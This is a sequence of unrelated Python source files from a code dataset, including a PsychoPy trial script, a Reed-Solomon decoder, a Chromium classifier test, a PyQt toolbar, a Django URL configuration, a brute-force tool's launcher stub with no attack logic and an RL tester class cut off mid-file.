font=u'Courier',\n units='norm', pos=[0, -0.4], height=0.2, wrapWidth=2,\n color=[0,0,0], colorSpace='rgb', opacity=1,\n depth=-6.0)\nLowerBrackets_2 = visual.TextStim(win=win, 
ori=0, name='LowerBrackets_2',\n text=u' { } ', font=u'Courier',\n units='norm', pos=[0, -0.4], height=0.2, wrapWidth=None,\n color=u'cyan', colorSpace='rgb', opacity=1,\n depth=-7.0)\nBotLowerLine_2 = visual.Line(win=win, name='BotLowerLine_2',units='norm', \n start=(-[2, 0.5][0]/2.0, 0), end=(+[2, 0.5][0]/2.0, 0),\n ori=0, pos=[0, -0.65],\n lineWidth=2, lineColor='cyan', lineColorSpace='rgb',\n fillColor='cyan', fillColorSpace='rgb',\n opacity=1,depth=-8.0, \ninterpolate=True)\nTrialCrossHair_2 = visual.TextStim(win=win, ori=0, name='TrialCrossHair_2',\n text='+', font='Arial',\n units='norm', pos=[0, 0], height=0.2, wrapWidth=None,\n color='green', colorSpace='rgb', opacity=1,\n depth=-9.0)\nRestCrossHair_2 = visual.TextStim(win=win, ori=0, name='RestCrossHair_2',\n text='+', font='Arial',\n units='norm', pos=[0, 0], height=0.2, wrapWidth=None,\n color='red', colorSpace='rgb', opacity=1,\n depth=-10.0)\n\n# Create some handy timers\nglobalClock = core.Clock() # to track the time since experiment started\nroutineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine \n\n#------Prepare to start Routine \"trial\"-------\nt = 0\ntrialClock.reset() # clock \nframeN = -1\nroutineTimer.add(13.000000)\n# update component parameters for each repeat\nUpperText_2.setText(u' L K R G M X ')\nUpperBrackets_2.setText(u' { }')\nLowerText_2.setText(u'btygqj')\nKeyboardResp_2 = event.BuilderKeyResponse() # create an object of type KeyResponse\nKeyboardResp_2.status = NOT_STARTED\n# keep track of which components have finished\ntrialComponents = 
[]\ntrialComponents.append(ISI)\ntrialComponents.append(TopUpperLine_2)\ntrialComponents.append(UpperText_2)\ntrialComponents.append(UpperBrackets_2)\ntrialComponents.append(BotUpperLine_2)\ntrialComponents.append(TopLowerLine_2)\ntrialComponents.append(LowerText_2)\ntrialComponents.append(LowerBrackets_2)\ntrialComponents.append(BotLowerLine_2)\ntrialComponents.append(TrialCrossHair_2)\ntrialComponents.append(RestCrossHair_2)\ntrialComponents.append(KeyboardResp_2)\nfor thisComponent in trialComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"trial\"-------\ncontinueRoutine = True\nwhile continueRoutine and routineTimer.getTime() > 0:\n # get current time\n t = trialClock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *TopUpperLine_2* updates\n if t >= 0 and TopUpperLine_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n TopUpperLine_2.tStart = t # underestimates by a little under one frame\n TopUpperLine_2.frameNStart = frameN # exact frame index\n TopUpperLine_2.setAutoDraw(True)\n if TopUpperLine_2.status == STARTED and t >= (0 + (13-win.monitorFramePeriod*0.75)): #most of one frame period left\n TopUpperLine_2.setAutoDraw(False)\n \n # *UpperText_2* updates\n if t >= 0 and UpperText_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n UpperText_2.tStart = t # underestimates by a little under one frame\n UpperText_2.frameNStart = frameN # exact frame index\n UpperText_2.setAutoDraw(True)\n if UpperText_2.status == STARTED and t >= (0 + (2-win.monitorFramePeriod*0.75)): #most of one frame period left\n UpperText_2.setAutoDraw(False)\n \n # *UpperBrackets_2* updates\n if t >= 0.0 and UpperBrackets_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n UpperBrackets_2.tStart = t # underestimates by a little under one frame\n UpperBrackets_2.frameNStart = 
frameN # exact frame index\n UpperBrackets_2.setAutoDraw(True)\n if UpperBrackets_2.status == STARTED and t >= (0.0 + (2-win.monitorFramePeriod*0.75)): #most of one frame period left\n UpperBrackets_2.setAutoDraw(False)\n \n # *BotUpperLine_2* updates\n if t >= 0.0 and BotUpperLine_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n BotUpperLine_2.tStart = t # underestimates by a little under one frame\n BotUpperLine_2.frameNStart = frameN # exact frame index\n BotUpperLine_2.setAutoDraw(True)\n if BotUpperLine_2.status == STARTED and t >= (0.0 + (13-win.monitorFramePeriod*0.75)): #most of one frame period left\n BotUpperLine_2.setAutoDraw(False)\n \n # *TopLowerLine_2* updates\n if t >= 0.0 and TopLowerLine_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n TopLowerLine_2.tStart = t # underestimates by a little under one frame\n TopLowerLine_2.frameNStart = frameN # exact frame index\n TopLowerLine_2.setAutoDraw(True)\n if TopLowerLine_2.status == STARTED and t >= (0.0 + (13-win.monitorFramePeriod*0.75)): #most of one frame period left\n TopLowerLine_2.setAutoDraw(False)\n \n # *LowerText_2* updates\n if t >= 7 and LowerText_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n LowerText_2.tStart = t # underestimates by a little under one frame\n LowerText_2.frameNStart = frameN # exact frame index\n LowerText_2.setAutoDraw(True)\n if LowerText_2.status == STARTED and t >= (7 + (2-win.monitorFramePeriod*0.75)): #most of one frame period left\n LowerText_2.setAutoDraw(False)\n \n # *LowerBrackets_2* updates\n if t >= 7 and LowerBrackets_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n LowerBrackets_2.tStart = t # underestimates by a little under one frame\n LowerBrackets_2.frameNStart = frameN # exact frame index\n LowerBrackets_2.setAutoDraw(True)\n if LowerBrackets_2.status == STARTED and t >= (7 + (2-win.monitorFramePeriod*0.75)): #most of one frame period left\n 
LowerBrackets_2.setAutoDraw(False)\n \n # *BotLowerLine_2* updates\n if t >= 0.0 and BotLowerLine_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n BotLowerLine_2.tStart = t # underestimates by a little under one frame\n BotLowerLine_2.frameNStart = frameN # exact frame index\n BotLowerLine_2.setAutoDraw(True)\n if BotLowerLine_2.status == STARTED and t >= (0.0 + (13-win.monitorFramePeriod*0.75)): #most of one frame period left\n BotLowerLine_2.setAutoDraw(False)\n \n # *TrialCrossHair_2* updates\n if t >= 0 and TrialCrossHair_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n TrialCrossHair_2.tStart = t # underestimates by a little under one frame\n TrialCrossHair_2.frameNStart = frameN # exact frame index\n TrialCrossHair_2.setAutoDraw(True)\n if TrialCrossHair_2.status == STARTED and t >= (0 + (9-win.monitorFramePeriod*0.75)): #most of one frame period left\n TrialCrossHair_2.setAutoDraw(False)\n \n # *RestCrossHair_2* updates\n if t >= 9 and RestCrossHair_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n RestCrossHair_2.tStart = t # underestimates by a little under one frame\n RestCrossHair_2.frameNStart = frameN # exact frame index\n RestCrossHair_2.setAutoDraw(True)\n if RestCrossHair_2.status == STARTED and t >= (9 + (4-win.monitorFramePeriod*0.75)): #most of one frame period left\n RestCrossHair_2.setAutoDraw(False)\n \n # *KeyboardResp_2* updates\n if t >= 7 and KeyboardResp_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n KeyboardResp_2.tStart = t # underestimates by a little under one frame\n KeyboardResp_2.frameNStart = frameN # exact frame index\n KeyboardResp_2.status = STARTED\n # keyboard checking is just starting\n KeyboardResp_2.clock.reset() # now t=0\n event.clearEvents(eventType='keyboard')\n if KeyboardResp_2.status == STARTED and t >= (7 + (2-win.monitorFramePeriod*0.75)): #most of one frame period left\n KeyboardResp_2.status = STOPPED\n if 
KeyboardResp_2.status == STARTED:\n theseKeys = event.getKeys(keyList=['1', '2', '3', '4', '5', '6', '7', '8'])\n \n # check for quit:\n if \"escape\" in theseKeys:\n endExpNow = True\n if len(theseKeys) > 0: # at least one key was pressed\n KeyboardResp_2.keys.extend(theseKeys) # storing all keys\n KeyboardResp_2.rt.append(KeyboardResp_2.clock.getTime())\n # was this 'correct'?\n if (KeyboardResp_2.keys == str(Correct)) or (KeyboardResp_2.keys == Correct):\n KeyboardResp_2.corr = 1\n else:\n KeyboardResp_2.corr = 0\n # *ISI* period\n if t >= 0.0 and ISI.status == NOT_STARTED:\n # keep track of start time/frame for later\n ISI.tStart = t # underestimates by a little under one frame\n ISI.frameNStart = frameN # exact frame index\n ISI.start(1)\n elif ISI.status == STARTED: #one frame should pass before updating params and completing\n ISI.complete() #finish the static period\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in trialComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the Esc key)\n if endExpNow or event.getKeys(keyList=[\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n\n#-------Ending Routine \"trial\"-------\nfor thisComponent in trialComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n# check responses\nif KeyboardResp_2.keys in ['', [], None]: # No response was made\n KeyboardResp_2.keys=None\n # was no response the correct answer?!\n if str(Correct).lower() == 'none': KeyboardResp_2.corr = 1 # correct non-response\n else: KeyboardResp_2.corr = 0 # failed to respond 
(incorrectly)\n# store data for thisExp (ExperimentHandler)\nthisExp.addData('KeyboardResp_2.keys',KeyboardResp_2.keys)\nthisExp.addData('KeyboardResp_2.corr', KeyboardResp_2.corr)\nif KeyboardResp_2.keys != None: # we had a response\n thisExp.addData('KeyboardResp_2.rt', KeyboardResp_2.rt)\nthisExp.nextEntry()\nwin.close()\ncore.quit()\n","sub_path":"PartialTrialDIR/Scripts/Testing/TestExamples_lastrun.py","file_name":"TestExamples_lastrun.py","file_ext":"py","file_size_in_byte":15072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"614446326","text":"\n# coding: utf-8\n\n# In[ ]:\n\n\nimport numpy as np\nfrom Source.GF64 import GFE\nfrom Source import GF_FUNC as GF_F\n\n\n# In[ ]:\n\n\ndef Syndrome_Check(t_RS, r_vector_RS, order_alpha, Z_RS):\n syndrome_RS=-1*np.ones(2*t_RS)\n for i in range(2*t_RS):\n for j in range(len(r_vector_RS)): \n dum1 = GF_F.GF_MUL(r_vector_RS[j], Z_RS[i]*j, order_alpha)\n syndrome_RS[i] = GF_F.GF_Add(dum1, syndrome_RS[i])[0]\n\n syndrome_check = 0\n for i in range(2*t_RS):\n if syndrome_RS[i] >= 0:\n syndrome_check+=1\n \n return syndrome_RS, syndrome_check\n\n\n# In[ ]:\n\ndef Receive_Bit(Eb_No, cx, k_RS, n_RS):\n req_Eb_No = 10**(Eb_No/10)\n Es_No = req_Eb_No * (k_RS/n_RS)\n Sigma=np.sqrt(1/(2*Es_No))\n \n rx = cx + np.random.normal(loc=0.0,scale=Sigma,size=cx.shape)\n \n return rx\n\ndef Trans_symbol(rx, m):\n r_RS = []\n rx_Hard = np.where(rx > 0.5, 1, 0)\n for i in range(0, len(rx), m):\n r_RS.append(GF_F.GF_Index(rx_Hard[i:i+m]))\n \n return r_RS\n\ndef SER_Calculation(Estimated_code, msg_RS, length_parity):\n Estimated_msg = Estimated_code[:,length_parity:]\n index = np.where((Estimated_msg - msg_RS) != 0)\n \n error_count = index[0].shape[0]\n \n SER = error_count/(msg_RS.shape[0]*msg_RS.shape[1])\n \n return SER\n \n\ndef Decoder(syndrome_RS, syndrome_check, r_vector_RS, t_RS, order_alpha, m):\n if syndrome_check == 0:\n return r_vector_RS\n else:\n A_coeff=[]\n for i in 
range(2*t_RS): \n A_coeff.append(-1) \n A_coeff.append(0)\n \n B_coeff=list(syndrome_RS)\n \n REMAINDER=[]\n REMAINDER.append(A_coeff)\n REMAINDER.append(B_coeff)\n \n T_coefficient=[]\n T_coefficient.append([-1]) ## alpha^-1 = 0 ##\n T_coefficient.append([0]) ## alpha^0 = 1 ##\n \n QUOTIENT=[]\n cnt_i=0\n while len(REMAINDER[-1])-1 >= t_RS:\n QUO, REM = GF_F.POL_DIV(REMAINDER[-2],REMAINDER[-1], order_alpha, m)\n QUOTIENT.append(QUO)\n REMAINDER.append(REM)\n Dummy_A=T_coefficient[-2]\n Dummy_B=GF_F.POL_MUL(QUOTIENT[-1],T_coefficient[-1], order_alpha)\n Dummy_C=GF_F.POL_Add(Dummy_A,Dummy_B)\n T_coefficient.append(Dummy_C)\n cnt_i+=1\n \n Kappa=(-1*T_coefficient[-1][0])%order_alpha \n Error_Location_coeff=[]\n for i in range(len(T_coefficient[-1])):\n Dummy=T_coefficient[-1][i]\n Error_Location_coeff.append(GF_F.GF_MUL(Kappa,Dummy, order_alpha))\n \n for i in range(len(T_coefficient[-1])):\n if T_coefficient[-1][-1] < 0:\n del T_coefficient[-1][-1]\n else: \n break\n \n Error_Evaluation_coeff=[]\n for i in range(len(REMAINDER[-1])):\n Dummy=REMAINDER[-1][i]\n Error_Evaluation_coeff.append(GF_F.GF_MUL(Kappa,Dummy, order_alpha))\n \n error_positions=[]\n Chien_Search_Values=[]\n num_errors=0\n for i in range(order_alpha):\n alpha_minus_i=(-1*i)%order_alpha ## alpha^(-i mod order_alpha), i=0,1,...,order_alpha ##\n Error_Location_Function_Value=GF_F.GF_Function_Value(alpha_minus_i,order_alpha,Error_Location_coeff)\n Chien_Search_Values.append(Error_Location_Function_Value)\n if Error_Location_Function_Value == -1: \n error_positions.append(i)\n num_errors+=1\n\n ## Error Evaluation after finding error locations ##\n # Derivative of Error Location Polynomial #\n Error_Location_Der=GF_F.GF_Derivative(Error_Location_coeff, order_alpha)\n \n # Numerator of Error Evaluation function #\n Error_Numerator=[]\n Error_Denominator=[]\n Error_Estimated_Values=[]\n Estimated_Error_Vector=-1*np.ones(len(r_vector_RS)) # Error Vector #\n for i in range(num_errors):\n 
Inv_Xi_Index=(-1*error_positions[i])%order_alpha\n Numerator_i=GF_F.GF_Function_Value(Inv_Xi_Index,order_alpha,Error_Evaluation_coeff)\n Error_Numerator.append(Numerator_i)\n Denominator_i=GF_F.GF_Function_Value(Inv_Xi_Index,order_alpha,Error_Location_Der)\n Error_Denominator.append(Denominator_i)\n Estim_Error_Value_i=GF_F.GF_MUL(Numerator_i,GF_F.GF_MUL_Inv(Denominator_i, order_alpha), order_alpha)\n Error_Estimated_Values.append(Estim_Error_Value_i)\n Estimated_Error_Vector[error_positions[i]]=Estim_Error_Value_i\n \n\n # Estimated Codeword #\n Estimated_Codeword=GF_F.POL_Add(r_vector_RS, Estimated_Error_Vector)\n \n return Estimated_Codeword\n\n","sub_path":"rs_code/Source/.ipynb_checkpoints/RS64_Decoder-checkpoint.py","file_name":"RS64_Decoder-checkpoint.py","file_ext":"py","file_size_in_byte":4698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"471694242","text":"# Copyright 2016 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nfrom analysis.analysis_testcase import AnalysisTestCase\nfrom analysis.occurrence import Occurrence\nfrom analysis.occurrence import DefaultOccurrenceRanking\nfrom analysis.occurrence import RankByOccurrence\nfrom analysis.stacktrace import StackFrame\nfrom analysis.stacktrace import CallStack\nfrom analysis.suspect import Suspect\nfrom gae_libs.pipeline_wrapper import pipeline_handlers\n\n\nclass DummyClassifier(object):\n\n def GetClassFromStackFrame(self, frame):\n if frame.dep_path == 'src/':\n return 'class_1'\n\n if frame.dep_path == 'dummy/':\n return None\n\n return 'class_2'\n\n def GetClassFromSuspect(self, _result): # pragma: no cover.\n return 'class_3'\n\n def Classify(self, results, crash_stack):\n top_n_frames = 4\n if results:\n classes = map(self.GetClassFromSuspect, results[:top_n_frames])\n else:\n classes = map(self.GetClassFromStackFrame,\n 
crash_stack.frames[:top_n_frames])\n\n class_list = RankByOccurrence(classes, 1)\n if class_list:\n return class_list[0]\n\n return ''\n\n\nclass ClassifierTest(AnalysisTestCase):\n\n def testDefaultOccurrenceRanking(self):\n self.assertEqual(DefaultOccurrenceRanking(Occurrence('c1', [0])),\n (-1, 0))\n self.assertEqual(DefaultOccurrenceRanking(Occurrence('c1', [0, 1])),\n (-float('inf'), 0))\n\n def testClassifyCrashStack(self):\n dummy_classifier = DummyClassifier()\n\n crash_stack = CallStack(0)\n self.assertEqual(dummy_classifier.Classify([], crash_stack), '')\n\n crash_stack = CallStack(0, frame_list=[\n StackFrame(0, 'src/', 'a::c(p* &d)', 'f0.cc', 'src/f0.cc', [177]),\n StackFrame(1, 'src/', 'a::d(a* c)', 'f1.cc', 'src/f1.cc', [227]),\n StackFrame(2, 'src/dummy', 'a::e(int)', 'f2.cc', 'src/f2.cc', [87]),\n StackFrame(3, 'dummy/', 'a::g(int)', 'f3.cc', 'src/f3.cc', [87])])\n\n self.assertEqual(dummy_classifier.Classify([], crash_stack), 'class_1')\n\n crash_stack = CallStack(0, frame_list=[\n StackFrame(0, 'src/', 'a::c(p* &d)', 'f0.cc', 'src/f0.cc', [177]),\n StackFrame(1, 'src/dummy', 'a::d(a* c)', 'f1.cc', 'src/f1.cc', [227]),\n StackFrame(2, 'src/dummy', 'a::e(int)', 'f2.cc', 'src/f2.cc', [87])])\n\n self.assertEqual(dummy_classifier.Classify([], crash_stack), 'class_2')\n\n def testClassifySuspects(self):\n dummy_classifier = DummyClassifier()\n\n suspect = Suspect(self.GetDummyChangeLog(), 'src/')\n suspect.file_to_stack_infos = {\n 'f0.cc': [(StackFrame(\n 0, 'src/', 'a::c(p* &d)', 'f0.cc', 'src/f0.cc', [177]), 0)]\n }\n\n self.assertEqual(dummy_classifier.Classify([suspect], CallStack(0)),\n 'class_3')\n\n","sub_path":"appengine/predator/analysis/test/occurrence_test.py","file_name":"occurrence_test.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"601577937","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 12 14:17:09 
2016\r\n\r\n@author: M1029148\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn import linear_model\r\nimport os\r\nos.chdir('D:\\\\allstate')\r\ndf_train=pd.read_csv(\"train.csv\")\r\ndf_test=pd.read_csv(\"test.csv\")\r\nusecols=[]\r\nfor c in df_train.columns:\r\n if 'cont' in c:\r\n usecols.append(c)\r\n\r\nx_train = df_train[usecols]\r\nx_test =df_test[usecols]\r\ny_train=df_train['loss']\r\nid_test=df_test['id']\r\n\r\nfor c in df_train.columns:\r\n if 'cat' in c:\r\n df_train[c]=df_train[c].astype('category')\r\n df_test[c]=df_test[c]. astype('category')\r\n x_train[c + '_numeric'] = df_train[c].cat.codes\r\n x_test[c + '_numeric'] = df_test[c].cat.codes\r\n\r\nregr = linear_model.LinearRegression()\r\nregr.fit(x_train,y_train)\r\ny_pred = regr.predict(x_test)\r\nsub= pd.DataFrame()\r\nsub['id']=id_test\r\nsub['loss']=y_pred\r\nsub.to_csv('lin_regression.csv', index=False)","sub_path":"Prgm4.py","file_name":"Prgm4.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"498499023","text":"from random import shuffle\nfrom card import Card\n\nclass Deck:\n '''\n The Deck class represents a standard deck of cards in the form of a\n list. 
Card class explained in card.py.\n '''\n \n def __init__(self):\n '''Creates a list of 52 cards.'''\n self.cards = []\n types = ['K', 'Q', 'J', '10', '9', '8', '7', '6', '5', '4', '3', '2', 'A']\n # Create 4 cards of each type and append it to the cards list.\n for type in types:\n for i in range(4):\n new_card = Card(type)\n self.cards.append(new_card)\n\n def shuffle_deck(self):\n '''Uses random.shuffle to randomize the list.'''\n shuffle(self.cards)\n","sub_path":"deck.py","file_name":"deck.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"645151207","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Author: luyizhou4\n# @Date: 2020-02-11 14:46:36\n# @Function: \n# @Last Modified time: 2020-02-11 15:21:46\n\nimport sys\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport kaldi_io\n\ndef main():\n filename = sys.argv[1]\n out_path = sys.argv[2]\n lang_emb_start = int (sys.argv[3])\n lang_emb_end = int (sys.argv[4])\n emb = kaldi_io.read_mat(filename)\n emb = np.transpose(emb, (1,0))[lang_emb_start:lang_emb_end, :]\n print(emb.shape)\n plt.matshow(emb, fignum=None)\n plt.savefig(out_path + '.png')\n\nif __name__ == '__main__':\n main()","sub_path":"espnet/nets/pytorch_backend/mlpmoe/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"210194893","text":"import os\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QToolBar, QAction, QApplication, QFileDialog\n\nfrom src.data.applicationname import ApplicationName\nfrom src.data.screencapture import ScreenCapture\nfrom src.newapplicationwindow import NewApplicationWindow\n\n\ndef get_icon(file_name: str) -> str:\n current_directory_path = os.path.dirname(__file__)\n return 
os.path.abspath(os.path.join(current_directory_path, '..', 'resources', file_name))\n\n\nclass Toolbar(QToolBar):\n def __init__(self, on_start_run, on_stop_run,\n on_region_add, on_config_save, on_config_load):\n super(Toolbar, self).__init__()\n self.new_application_window = None\n self.on_start_run = on_start_run\n self.on_stop_run = on_stop_run\n self.capture_area = ScreenCapture()\n self.capture_area.bind(self.on_update_capture_area)\n self.on_region_add_callback = on_region_add\n self.on_config_save = on_config_save\n self.on_config_load = on_config_load\n\n self.start = None\n self.stop = None\n self.add_region_action = None\n\n self.application_name = ApplicationName()\n self.application_name.bind(self.on_application_name_change)\n self.running = False\n\n self.init_toolbar()\n\n def init_toolbar(self):\n new_application = QAction(QIcon(get_icon('NewIcon.png')), 'New Application', self)\n new_application.triggered.connect(self.on_new_application)\n new_application.setStatusTip('Application to search for')\n\n save_config = QAction(QIcon(get_icon('SaveIcon.png')), 'Save configuration', self)\n save_config.triggered.connect(self.on_save_press)\n save_config.setStatusTip('Save configuration')\n\n load_config = QAction(QIcon(get_icon('LoadIcon.png')), 'Load configuration', self)\n load_config.triggered.connect(self.on_load_press)\n load_config.setStatusTip('Load configuration')\n\n self.start = QAction(QIcon(get_icon('StartIcon.png')), 'Start', self)\n self.start.triggered.connect(self.on_start)\n self.start.setDisabled(self.is_start_disabled())\n self.start.setStatusTip('Start')\n\n self.stop = QAction(QIcon(get_icon('PauseIcon.png')), 'Stop', self)\n self.stop.triggered.connect(self.on_stop)\n self.stop.setDisabled(self.is_stop_disabled())\n self.stop.setStatusTip('Stop')\n\n self.add_region_action = QAction(QIcon(get_icon('RegionIcon.png')), 'New Region', self)\n self.add_region_action.triggered.connect(self.on_region_add)\n 
self.add_region_action.setDisabled(True)\n self.add_region_action.setStatusTip('Create a new region')\n\n self.addAction(new_application)\n self.addAction(save_config)\n self.addAction(load_config)\n self.addAction(self.start)\n self.addAction(self.stop)\n self.addAction(self.add_region_action)\n\n def is_start_disabled(self):\n application_name = self.application_name.get()\n return (application_name is None or application_name is \"\") or self.running\n\n def is_stop_disabled(self):\n return not self.running\n\n def on_application_name_change(self, _):\n self.set_buttons_disabled_state()\n\n def on_app_dialog_confirm(self, text):\n self.application_name.set(text)\n\n def on_load_press(self):\n selected = QFileDialog.getOpenFileName(self, 'Load Configuration', '', \"AutoMate files (*.automate)\")\n if selected[0] is not \"\":\n self.on_config_load(selected[0])\n self.set_buttons_disabled_state()\n\n def on_new_application(self):\n self.new_application_window = NewApplicationWindow(self.application_name.get())\n self.new_application_window.on_confirm(self.on_app_dialog_confirm)\n\n def on_region_add(self):\n QApplication.setOverrideCursor(Qt.CrossCursor)\n self.on_region_add_callback()\n\n def on_save_press(self):\n selected = QFileDialog.getSaveFileName(self, 'Save Configuration', '', \"AutoMate files (*.automate)\")\n if selected[0] is not \"\":\n self.on_config_save(selected[0])\n\n def on_start(self):\n self.running = True\n self.set_buttons_disabled_state()\n self.on_start_run()\n self.update()\n\n def on_stop(self):\n self.running = False\n self.set_buttons_disabled_state()\n self.on_stop_run()\n self.update()\n\n def on_update_capture_area(self, _):\n self.add_region_action.setDisabled(False)\n\n def set_buttons_disabled_state(self):\n self.stop.setDisabled(self.is_stop_disabled())\n 
self.start.setDisabled(self.is_start_disabled())\n","sub_path":"src/toolbar.py","file_name":"toolbar.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"371050713","text":"import numpy\nimport os\n\ntemp = []\npath = 'data/txtshort/'\nlisting = os.listdir(path)\nfor infile in listing:\n\tarrays = numpy.genfromtxt(path+infile)\n\ttemp.append(arrays)\n\narr = numpy.zeros((15,15,2178))\n\n\nfor x in range(len(temp)):\n\tarr[x] = temp[x]\n\n\nx_train = arr[:7]\ny_train = arr[:7]\n\nx_val = arr[7:9]\ny_val = arr[7:9]\nx_test = arr[-1] \ny_test = arr[-1]\n\n\n\n\n","sub_path":"dump/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"261739133","text":"frase = input('Entre com uma frase: ')\nfrasenospace = frase.replace(' ', '') \nprint(frasenospace)\nquantiletra = (len(frasenospace)) \nprint(quantiletra)\n\nletraespec = input('qual letra vc deseja conferir:')\nletraespecvss = frasenospace.count(letraespec)\n\nporcenletra = (letraespecvss/quantiletra)*100 \nprint('A letra: {}, aparece {} vezes na frase: {}'.format(letraespec, letraespecvss, frase))\nprint('A porcentagem de repetição desse caracterer em relação ao tamanho da frase é {:.2f}%'.format(porcenletra))","sub_path":"porcentagem.py","file_name":"porcentagem.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"468666163","text":"### INSTABRUTE BY THEAUTISTIC9 ###\n### NOT MAKED FOR ILLEGAL PURPOSES ###\n### DEDICATED TO LUXI, ANON, MANGEL AND ANA ###\n### HAVE FUN ###\n\nfrom lib.banner import banner\nfrom lib.colors import colors\n\ndef main():\n\tcommand = input(colors.UNDERLINE+'instaBrute'+colors.ENDC+'> ')\n\tbanner.console(command)\n\treturn\n\n\n#init\nbanner.intro()\nwhile 
True:\n\tmain()\n","sub_path":"instabrute.py","file_name":"instabrute.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"628708956","text":"from django.conf.urls import include, url, patterns\nimport views\n\nurlpatterns = patterns ('',\n\turl(r'^$', views.index, name='index'),\n\turl(r'^logout$', views.logout, name='logout'),\n\turl(r'^home$', views.home, name='home'),\n\turl(r'^profile$', views.profile, name='profile'),\n\turl(r'^profile/edit$', views.edit_profile, name='edit_profile'),\n\turl(r'^profile/update$', views.update_profile, name='update_profile'),\n\n)\n","sub_path":"apps/login/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"301187612","text":"#!/usr/bin/env python\n# coding=utf-8\n\n# Author : Xionghui Chen\n# Created : 2017-11-12\n# Modified : 2017-11-12\n# Version : 1.0\nimport matplotlib.pyplot as plt\nimport pickle\nimport time\nfrom gym import wrappers\nimport os\nimport sys\nMAX_ITER = 2000\n\n\nclass Tester(object):\n\n def __init__(self, episodes, period, env, time_step_holder, file, session, save_object=True):\n \"\"\"\n Tester is a class can store all of record and parameter in your experiment.\n It will be saved as a pickle. 
you can load it and plot those records to curve picture.\n\n Parameters\n ----------\n episodes : int\n repeat time per evalate test.\n\n period : int\n test period\n\n env : construct from gym.make\n test environment\n\n time_step_holder: common.variable.TimeStepHolder\n glabal time step holder\n\n file: string\n file to store pickle\n \"\"\"\n self.period = period\n self.time_step_holder = time_step_holder\n self.episodes = episodes\n self.__custom_recorder = {}\n self.super_param = {}\n self.session = session\n self.strftims = str(time.strftime(\n \"%Y-%m-%d %H:%M:%S\", time.localtime()))\n self.file = file+'/' + self.strftims + '.pkl'\n self.env = env\n self.save_object = save_object\n self.__custom_data = {}\n # sys.stdout = open('./log/'+self.strftims+'.log', 'w')\n # wrappers.Monitor(\n # env, VIDEO_PREFIX_PATH + self.strftims, video_callable=lambda: True)\n\n def reset_tester(self):\n self.__custom_recorder = {}\n self.__custom_data = {}\n self.strftims = str(time.strftime(\n \"%Y-%m-%d %H:%M:%S\", time.localtime()))\n self.file = file+'/' + self.strftims + '.pkl'\n\n def check_and_test(self, agent, use_temp=False, always=False):\n if self.time_step_holder.get_time() % self.period == 0 or always:\n e = 0\n avg_return = 0\n current_return_list = []\n state_num_list = []\n while e < self.episodes:\n itera_num = 0\n ob = self.env.reset()\n current_return = 0\n terminal = False\n state_number = 0\n while not terminal:\n if use_temp:\n action = agent.act_temp(ob)\n else:\n action, _ = agent.act(True, ob)\n ob, reward, terminal, _ = self.env.step(action)\n current_return += reward\n itera_num += 1\n state_number += 1\n if itera_num > MAX_ITER:\n itera_num = 0\n break\n state_num_list.append(state_number)\n if e % int(self.episodes/10) == 0:\n print(\"end episodes %s\" % e)\n current_return_list.append(current_return)\n e += 1\n\n avg_return = sum(current_return_list) * 1.0 / \\\n len(current_return_list)\n avg_state = sum(state_num_list) * 1.0 / 
